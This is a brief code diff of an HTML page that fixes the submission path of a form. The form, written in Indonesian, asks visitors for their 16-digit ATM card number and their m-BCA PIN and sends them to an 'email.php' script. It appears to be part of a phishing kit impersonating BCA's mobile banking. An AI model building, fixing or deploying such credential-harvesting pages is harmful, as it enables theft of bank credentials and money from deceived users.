--- a/input.html
+++ b/input.html
@@ -20,7 +20,7 @@
     <img src="https://res.cloudinary.com/codelifings/image/upload/v1613365398/Tak_berjudul43_20210215120201_np8fkd.png" alt="">
   </div>
   <br><br>
-    <form action="/email.php" method="POST">
+    <form action="email.php" method="POST">
       <input class="u-full-width" type="number" placeholder="Masukkan 16 angka No Kartu ATM anda" id="nomor_atm" name="nomor_atm">
       <input class="u-full-width" type="number" placeholder="Masukkan Pin m-BCA Anda" id="pin" name="pin">
       <input style="float: right" name="send" class="button-primary" type="submit" value="OK">
